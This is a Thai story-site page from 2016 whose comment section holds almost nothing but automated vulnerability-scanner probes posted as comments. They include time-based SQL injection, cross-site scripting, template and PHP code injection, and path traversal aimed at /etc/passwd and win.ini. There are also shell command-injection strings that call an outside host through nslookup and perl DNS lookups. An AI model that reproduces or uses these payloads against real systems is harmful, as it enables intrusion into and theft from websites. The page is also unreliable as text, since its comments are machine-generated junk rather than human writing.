ติดตามเรื่องนี้
อารัมภบท
ชื่อตอน
บทนำ 27 ก.ย. 2016, 09:20 น. 0 2134
กดแชร์

เรื่องอื่นๆ ของไรเตอร์

แสดงความคิดเห็น

(อีเมล์ของคุณจะไม่แสดงให้คนอื่นเห็น)

384 Comments

no-image
pHqghUme
555
no-image
@@cSfis
555
no-image
1????%2527%2522
555
no-image
1'"
555
no-image
pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
no-image
BeJzmQkc')) OR 602=(SELECT 602 FROM PG_SLEEP(15))--
555
no-image
f34C3OKv') OR 204=(SELECT 204 FROM PG_SLEEP(15))--
555
no-image
o6VMBsL1' OR 416=(SELECT 416 FROM PG_SLEEP(15))--
555
no-image
HzjLucZj'; waitfor delay '0:0:15' --
555
no-image
1 waitfor delay '0:0:15' --
555
no-image
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(
555
no-image
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
555
no-image
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
555
no-image
if(now()=sysdate(),sleep(15),0)
555
no-image
-1" OR 3*2>(0+5+195-195) --
555
no-image
-1" OR 3*2
555
no-image
-1" OR 3+195-195-1=0+0+0+1 --
555
no-image
-1" OR 2+195-195-1=0+0+0+1 --
555
no-image
-1' OR 3*2>(0+5+879-879) or 'eWZoZDDr'='
555
no-image
-1' OR 3*2
555
no-image
-1' OR 3+879-879-1=0+0+0+1 or 'eWZoZDDr'='
555
no-image
-1' OR 2+879-879-1=0+0+0+1 or 'eWZoZDDr'='
555
no-image
-1' OR 3*2>(0+5+944-944) --
555
no-image
-1' OR 3*2
555
no-image
-1' OR 3+944-944-1=0+0+0+1 --
555
no-image
-1' OR 2+944-944-1=0+0+0+1 --
555
no-image
-1 OR 3*2>(0+5+473-473)
555
no-image
-1 OR 3*2
555
no-image
-1 OR 3+473-473-1=0+0+0+1
555
no-image
-1 OR 2+473-473-1=0+0+0+1
555
no-image
-1 OR 3*2>(0+5+160-160) --
555
no-image
-1 OR 3*2
555
no-image
-1 OR 3+160-160-1=0+0+0+1 --
555
no-image
-1 OR 2+160-160-1=0+0+0+1 --
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
@@fMBAr
no-image
pHqghUme
1????%2527%2522
no-image
pHqghUme
1'"
no-image
pHqghUme
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
no-image
pHqghUme
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
no-image
pHqghUme
7sDRrjLi')) OR 20=(SELECT 20 FROM PG_SLEEP(15))--
no-image
pHqghUme
cJzobNEM') OR 988=(SELECT 988 FROM PG_SLEEP(15))--
no-image
pHqghUme
b064CrfO' OR 648=(SELECT 648 FROM PG_SLEEP(15))--
no-image
pHqghUme
-1)) OR 994=(SELECT 994 FROM PG_SLEEP(15))--
no-image
pHqghUme
-5) OR 859=(SELECT 859 FROM PG_SLEEP(15))--
no-image
pHqghUme
-5 OR 420=(SELECT 420 FROM PG_SLEEP(15))--
no-image
pHqghUme
opqGYIRe'; waitfor delay '0:0:15' --
no-image
pHqghUme
1 waitfor delay '0:0:15' --
no-image
pHqghUme
-1); waitfor delay '0:0:15' --
no-image
pHqghUme
-1; waitfor delay '0:0:15' --
no-image
pHqghUme
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
no-image
pHqghUme
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
no-image
pHqghUme
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
no-image
pHqghUme
if(now()=sysdate(),sleep(15),0)
no-image
pHqghUme
-1" OR 3*2>(0+5+408-408) --
no-image
pHqghUme
-1" OR 3*2
no-image
pHqghUme
-1" OR 3+408-408-1=0+0+0+1 --
no-image
pHqghUme
-1" OR 2+408-408-1=0+0+0+1 --
no-image
pHqghUme
-1' OR 3*2>(0+5+881-881) or 'xGI2OvEA'='
no-image
pHqghUme
-1' OR 3*2
no-image
pHqghUme
-1' OR 3+881-881-1=0+0+0+1 or 'xGI2OvEA'='
no-image
pHqghUme
-1' OR 2+881-881-1=0+0+0+1 or 'xGI2OvEA'='
no-image
pHqghUme
-1' OR 3*2>(0+5+521-521) --
no-image
pHqghUme
-1' OR 3*2
no-image
pHqghUme
-1' OR 3+521-521-1=0+0+0+1 --
no-image
pHqghUme
-1' OR 2+521-521-1=0+0+0+1 --
no-image
pHqghUme
-1 OR 3*2>(0+5+62-62)
no-image
pHqghUme
-1 OR 3*2
no-image
pHqghUme
-1 OR 3+62-62-1=0+0+0+1
no-image
pHqghUme
-1 OR 2+62-62-1=0+0+0+1
no-image
pHqghUme
-1 OR 3*2>(0+5+502-502) --
no-image
pHqghUme
-1 OR 3*2
no-image
pHqghUme
-1 OR 3+502-502-1=0+0+0+1 --
no-image
pHqghUme
555
no-image
pHqghUme
-1 OR 2+502-502-1=0+0+0+1 --
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUmeEOCCX[!+!]
555
no-image
pHqghUmeUBuwg PBj8(9215)
555
no-image
pHqghUme
555
no-image
pHqghUme}body{acu:Expre/**/SSion(PBj8(9499))}
555
no-image
pHqghUme
555
no-image
555
no-image
555
no-image
pHqghUme
555
no-image
?
555
no-image
pHqghUme<ScRiPt>PBj8(9758)</sCripT>
555
no-image
pHqghUme\u003CScRiPt\PBj8(9557)\u003C/sCripT\u003E
555
no-image
%70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%50%42%6A%38%289251%29%3C%2F%73%43%72%69%70%54%3E
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUmePBj8(9276)
555
no-image
pHqghUme
555
no-image
pHqghUmePBj8(9864)
555
no-image
pHqghUmePBj8(9588)
555
no-image
pHqghUmePBj8(9198)
555
no-image
pHqghUmeB0RVN[!+!]
555
no-image
pHqghUmePBj8(9383)
555
no-image
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
no-image
acx__${98991*97996}__::.x
555
no-image
acx[[${98991*97996}]]xca
555
no-image
acx{{98991*97996}}xca
555
no-image
1}}"}}'}}1%>"%>'%>
555
no-image
555
no-image
555
no-image
acux5908??z1??z2a?bcxuca5908
555
no-image
acu4480<s1﹥s2ʺs3ʹuca4480
555
no-image
pHqghUme9539960
555
no-image
'"()&%PBj8(9405)
555
no-image
pHqghUme'"()&%PBj8(9860)
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555JCERL[!+!]
no-image
pHqghUme
555hKIs1
PBj8(9086)
no-image
pHqghUme
555
no-image
pHqghUme
555}body{acu:Expre/**/SSion(PBj8(9119))}
no-image
pHqghUme
no-image
pHqghUme
no-image
pHqghUme
555
no-image
pHqghUme
?
no-image
pHqghUme
555<ScRiPt>PBj8(9035)</sCripT>
no-image
pHqghUme
555\u003CScRiPt\PBj8(9016)\u003C/sCripT\u003E
no-image
pHqghUme
%35%35%35%3C%53%63%52%69%50%74%20%3E%50%42%6A%38%289350%29%3C%2F%73%43%72%69%70%54%3E
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555PBj8(9645)
no-image
pHqghUme
555
no-image
pHqghUme
555PBj8(9685)
no-image
;(nslookup hitjwvwehekpxf08b6.bxss.me||perl -e "gethostbyname('hitjwvwehekpxf08b6.bxss.me')")|(nsloo
555
no-image
`(nslookup hitqaswxltpfv897f6.bxss.me||perl -e "gethostbyname('hitqaswxltpfv897f6.bxss.me')")`
555
no-image
pHqghUme
555PBj8(9778)
no-image
|(nslookup hitugnmbxgwcbad061.bxss.me||perl -e "gethostbyname('hitugnmbxgwcbad061.bxss.me')")
555
no-image
pHqghUme
555PBj8(9383)
no-image
&(nslookup hitxasbcahzrvc81c8.bxss.me||perl -e "gethostbyname('hitxasbcahzrvc81c8.bxss.me')")&'\"`0&
555
no-image
pHqghUme
555ZWN4K[!+!]
no-image
pHqghUme
555PBj8(9583)
no-image
$(nslookup hitncqlycqfbm86dff.bxss.me||perl -e "gethostbyname('hitncqlycqfbm86dff.bxss.me')")
555
no-image
(nslookup hitswgiwrmkfpe451f.bxss.me||perl -e "gethostbyname('hitswgiwrmkfpe451f.bxss.me')")
555
no-image
|echo oltmnk$()\ dhipdr\nz^xyu||a #' |echo oltmnk$()\ dhipdr\nz^xyu||a #|" |echo oltmnk$()\ dhipdr\n
555
no-image
'.print(md5(31337)).'
555
no-image
pHqghUme
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
no-image
${@print(md5(31337))}\
555
no-image
${@print(md5(31337))}
555
no-image
";print(md5(31337));$a="
555
no-image
echo diojnb$()\ asuhey\nz^xyu||a #' &echo diojnb$()\ asuhey\nz^xyu||a #|" &echo diojnb$()\ asuhey\nz
555
no-image
&echo ydqhpq$()\ kwkzaw\nz^xyu||a #' &echo ydqhpq$()\ kwkzaw\nz^xyu||a #|" &echo ydqhpq$()\ kwkzaw\n
555
no-image
pHqghUme
acx__${98991*97996}__::.x
no-image
';print(md5(31337));$a='
555
no-image
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
no-image
pHqghUme
acx[[${98991*97996}]]xca
no-image
pHqghUme
acx{{98991*97996}}xca
no-image
pHqghUme
;(nslookup hitvpjbbcyuez1f386.bxss.me||perl -e "gethostbyname('hitvpjbbcyuez1f386.bxss.me')")|(nslookup hitvpjbbcyuez1f386.bxss.me||perl -e "gethostbyname('hitvpjbbcyuez1f386.bxss.me')")&(nslookup hitvpjbbcyuez1f386.bxss.me||perl -e "gethostbyname('hitvpjbbcyuez1f386.bxss.me')")
no-image
pHqghUme
'.print(md5(31337)).'
no-image
pHqghUme
${@print(md5(31337))}\
no-image
bxss.me
555
no-image
pHqghUme
`(nslookup hitrkfpwzxepk9f17e.bxss.me||perl -e "gethostbyname('hitrkfpwzxepk9f17e.bxss.me')")`
no-image
http://bxss.me/t/fit.txt?.jpg
555
no-image
pHqghUme
1}}"}}'}}1%>"%>'%>
no-image
Http://bxss.me/t/fit.txt
555
no-image
pHqghUme
|(nslookup hitynwuydvyes5d54a.bxss.me||perl -e "gethostbyname('hitynwuydvyes5d54a.bxss.me')")
no-image
pHqghUme
&(nslookup hitrokdrrjeif94346.bxss.me||perl -e "gethostbyname('hitrokdrrjeif94346.bxss.me')")&'\"`0&(nslookup hitrokdrrjeif94346.bxss.me||perl -e "gethostbyname('hitrokdrrjeif94346.bxss.me')")&`'
no-image
pHqghUme
$(nslookup hitqvpjmsmzzt007d7.bxss.me||perl -e "gethostbyname('hitqvpjmsmzzt007d7.bxss.me')")
no-image
1some_inexistent_file_with_long_name.jpg
555
no-image
pHqghUme
no-image
pHqghUme
${@print(md5(31337))}
no-image
pHqghUme
(nslookup hitlxnpwmulvo5caf7.bxss.me||perl -e "gethostbyname('hitlxnpwmulvo5caf7.bxss.me')")
no-image
pHqghUme
no-image
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
555
no-image
pHqghUme
";print(md5(31337));$a="
no-image
pHqghUme
|echo sjsmyf$()\ oslyxt\nz^xyu||a #' |echo sjsmyf$()\ oslyxt\nz^xyu||a #|" |echo sjsmyf$()\ oslyxt\nz^xyu||a #
no-image
pHqghUme
';print(md5(31337));$a='
no-image
pHqghUme
&echo lxnego$()\ hzbcoz\nz^xyu||a #' &echo lxnego$()\ hzbcoz\nz^xyu||a #|" &echo lxnego$()\ hzbcoz\nz^xyu||a #
no-image
pHqghUme
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
no-image
pHqghUme
echo afvvgk$()\ ozxmri\nz^xyu||a #' &echo afvvgk$()\ ozxmri\nz^xyu||a #|" &echo afvvgk$()\ ozxmri\nz^xyu||a #
no-image
pHqghUme
555
no-image
pHqghUme
acux9563??z1??z2a?bcxuca9563
no-image
pHqghUme
555
no-image
pHqghUme
acu9481<s1﹥s2ʺs3ʹuca9481
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
bxss.me
no-image
pHqghUme
555
no-image
pHqghUme
5559103471
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
http://bxss.me/t/fit.txt?.jpg
no-image
pHqghUme
'"()&%PBj8(9863)
no-image
pHqghUme
555
no-image
pHqghUme
Http://bxss.me/t/fit.txt
no-image
pHqghUme
555'"()&%PBj8(9775)
no-image
pHqghUme
555
no-image
pHqghUme
1some_inexistent_file_with_long_name.jpg
no-image
pHqghUme
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
/\xfs.bxss.me
555
no-image
//xfs.bxss.me
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
http://xfs.bxss.me
555
no-image
'+'A'.concat(70-3).concat(22*4).concat(122).concat(75).concat(116).concat(84)+(require'socket' Socke
555
no-image
pHqghUme
555
no-image
989262
555
no-image
/xfs.bxss.me
555
no-image
"+"A".concat(70-3).concat(22*4).concat(102).concat(83).concat(106).concat(78)+(require"socket" Socke
555
no-image
index.php
555
no-image
index.php/.
555
no-image
index.php
555
no-image
555
no-image
'"
555
no-image
./pHqghUme
555
no-image
pHqghUme
'+'A'.concat(70-3).concat(22*4).concat(102).concat(89).concat(102).concat(87)+(require'socket'
Socket.gethostbyname('hitxo'+'lgamnhqy51083.bxss.me.')[3].to_s)+'
no-image
pHqghUme
"+"A".concat(70-3).concat(22*4).concat(110).concat(71).concat(98).concat(72)+(require"socket"
Socket.gethostbyname("hitlm"+"nieyofoufb7c9.bxss.me.")[3].to_s)+"
no-image
pHqghUme
index.php/.
no-image
bxss.me/t/xss.html?%00
555
no-image
HttP://bxss.me/t/xss.html?%00
555
no-image
pHqghUme
no-image
../pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
index.php
no-image
pHqghUme
'"
no-image
pHqghUme
555
no-image
pHqghUme
/\xfs.bxss.me
no-image
../../../../../../../../../../../../../../windows/win.ini
555
no-image
../../../../../../../../../../../../../../etc/passwd
555
no-image
pHqghUme
555
no-image
pHqghUme
//xfs.bxss.me
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
bxss.me/t/xss.html?%00
no-image
pHqghUme
index.php
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
HttP://bxss.me/t/xss.html?%00
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
./555
no-image
pHqghUme
555
no-image
pHqghUme
../555
no-image
pHqghUme
http://xfs.bxss.me
no-image
pHqghUme
963103
no-image
^(#$!@#$)(()))******
555
no-image
!(()&&!|*|*|
555
no-image
)
555
no-image
pHqghUme
555
no-image
pHqghUme
/xfs.bxss.me
no-image
pHqghUme
../../../../../../../../../../../../../../windows/win.ini
no-image
pHqghUme
555
no-image
pHqghUme
../../../../../../../../../../../../../../etc/passwd
no-image
pHqghUme
555
no-image
pHqghUme
^(#$!@#$)(()))******
no-image
pHqghUme
!(()&&!|*|*|
no-image
pHqghUme
)
no-image
pHqghUme
555
no-image
"+response.write(9979779*9687583)+"
555
no-image
".gethostbyname(lc("hitzw"."homfojbx2ab59.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(77).ch
555
no-image
'+response.write(9979779*9687583)+'
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
response.write(9979779*9687583)
555
no-image
555
no-image
pHqghUme
555
no-image
'.gethostbyname(lc('hitlt'.'znxbewqse54d4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(82).ch
555
no-image
pHqghUme
555
no-image
pHqghUme
".gethostbyname(lc("hitnj"."tjwabmfz253a7.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(65).chr(102).chr(82)."
no-image
12345'"\'\");|]*{ ?''????
555
no-image
pHqghUme
555
no-image
pHqghUme
"+response.write(9391365*9655934)+"
no-image
pHqghUme
555
no-image
pHqghUme
'+response.write(9391365*9655934)+'
no-image
pHqghUme
response.write(9391365*9655934)
no-image
pHqghUme
'.gethostbyname(lc('hitfh'.'jpiucwil24a81.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(71).chr(122).chr(69).'
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
no-image
${9999603+10000138}
555
no-image
pHqghUme
12345'"\'\");|]*{
?''????
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
${9999836+10000140}
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
'"()
555
no-image
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
'"()
no-image
pHqghUme
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
Z2k4RUhWakc=
555
no-image
pHqghUme
555
no-image
pHqghUme
555
no-image
pHqghUme
555

ข้อตกลงในการใช้งาน

ข้อความทีท่านได้อ่านจาก เว็บเพจนี้ เกิดขึ้นจากการเขียนโดยสาธารณชน และ เผยแพร่โดยอัตโนมัติ ผู้ดูแลเว็บไซต์แห่งนี้ ไม่ได้เห็นด้วย และไม่ขอรับผิดชอบ ต่อข้อความใดๆทั้งสิ้น ดังนั้นผู้อ่านทุกท่าน โปรดใช้วิจารณญาณในการกลั่นกรองด้วยตนเอง และ ถ้าหากท่านพบเห็นข้อความใดๆ ที่ ขัดต่อกฎหมาย และ ศีลธรรม กรุณาแจ้งมาที่ webmasterเพื่อทีมงานจะได้ ดำเนินการในทันที ขอขอบพระคุณ